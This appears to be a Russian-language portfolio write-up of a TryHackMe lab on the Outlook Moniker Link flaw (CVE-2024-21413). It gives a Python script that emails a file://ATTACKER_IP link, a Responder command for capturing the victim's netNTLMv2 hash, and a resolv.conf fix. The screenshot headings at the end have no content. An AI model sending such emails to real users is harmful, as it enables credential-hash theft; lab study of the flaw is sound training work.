
Обзор: Практический PoC, демонстрирующий использование Moniker Link в HTML-письме для инициирования SMB-подключения из Outlook, что позволяет перехватить netNTLMv2-хэш жертвы с помощью Responder. Это демонстрирует практические навыки в области пентеста, написания скриптов и анализа сетевых протоколов.
file://), указывающим на SMB-ресурс атакующего.# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr
sender = '[email protected]'
receiver = '[email protected]'
mailserver = '10.201.52.124' # THM SMTP server
password = input('Enter attacker email password: ')
html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'
msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))
with smtplib.SMTP(mailserver, 25) as s:
s.ehlo()
s.login(sender, password)
s.sendmail(sender, [receiver], msg.as_string())
print('Email delivered')
Подсказка: Замените ATTACKER_IP и mailserver перед запуском. В лаборатории TryHackMe пароль — attacker.
responder -I ens5
Замените ens5 на имя вашего сетевого интерфейса.
/etc/resolv.confИногда Responder не работает из-за повреждённых символических ссылок в /etc/resolv.conf. Исправление:
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf
Выделяемые навыки: диагностика Linux, настройка DNS и адаптация инструментов для облачных/VM-сред.
Ошибка / проблема с resolv.conf:`

Применённое исправление DNS:

Python-скрипт для письма:

Доставка эксплойта:

Входящие жертвы:

Перехваченный хэш жертвы:

Адаптировано из лаборатории TryHackMe MonikerLink и оригинального PoC от CMNatic (GitHub)